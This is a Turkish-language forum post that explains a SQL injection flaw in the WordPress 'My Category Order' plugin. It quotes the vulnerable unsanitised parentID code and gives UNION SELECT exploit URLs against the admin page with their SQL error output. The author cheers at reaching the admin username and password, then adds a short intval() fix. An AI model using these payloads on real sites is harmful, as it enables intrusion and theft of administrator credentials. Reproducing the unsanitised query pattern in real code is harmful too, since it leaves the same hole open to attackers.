Forum'da ara:
Ara


« Önceki başlık :: Sonraki başlık »  
Yazar Mesaj
Mesaj13.04.2012, 17:55 (UTC)    
Mesaj konusu: WordPress 2.8 Sql İnjection Açığı

Standart WordPress 2.8 Sql İnjection Açığı
E
vet arkadaşlar bu yazımda günümüzde bir çok alan için kullanılan ve çok yaygın olan bir blog scripti olan Wordpress içine yüklenen bi pluginden dolayı verdiği kritik sql injection açığını anlatıcam

plugini
http://wordpress.org/extend/plugins/my-category-order/
burdan temin edebilirsiniz plugin adı mycategoryorder.php dosyasındadır

mycategoryorder.php dosyasını not defteri yada wordpad ile açtığınızda 47 ve 48.inci satırlarda

if (isset($_GET[’parentID’]))
$parentID = $_GET[’parentID’];

bu kodu bulacaksınız açık burdan kaynaklanmaktadır nasıl fixleyeceğinizi konu sonunda ayrı olarak anlatıcam açığın nasıl çalıştığına geri dönelim

evet işte exploitimizde bu

http://localh0st/wp-admin/post-new.p...String=3,5,4,1


yaptığınızda

[You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ’’ ORDER BY term_order ASC’ at line 1]
SELECT * FROM wp_terms t inner join wp_term_taxonomy tt on t.term_id = tt.term_id WHERE taxonomy = ’category’ and parent = 0’ ORDER BY term_order ASC

bu hata gelecektir evet doğru yoldasınız mutlu sona ulaşmanıza az kaldı

http://localh0st/wp-admin/post-new.p...ies&parentID=0 UNION SELECT 1,@@version,3,4,5,6,7,8,9,10,11--&idString=3,5,4,1

[+]

aman Allahım neler görüyorum admin panelinin kullanıcı adı ve şifresi

sonrasını biliyorsunuz zaten

FİXLEMEYE GELİNCE....

hatırlarmısınız mycategoryorder.php dosyasını açmış 47 ve 48. satırlardaki açığın kaynaklandığı kodları bulmuştuk şu kodlardan bahsediyorum...

if (isset($_GET[’parentID’]))
$parentID = $_GET[’parentID’];

işte bu kodları aşağıdaki kodla değiştireceksiniz...

if (isset($_GET[’parentID’]))
$parentID = intval($_GET[’parentID’]);
Önceki mesajları göster:   


Powered by phpBB © 2001, 2005 phpBB Group
Türkçe Çeviri: phpBB Türkiye & Erdem Çorapçıoğlu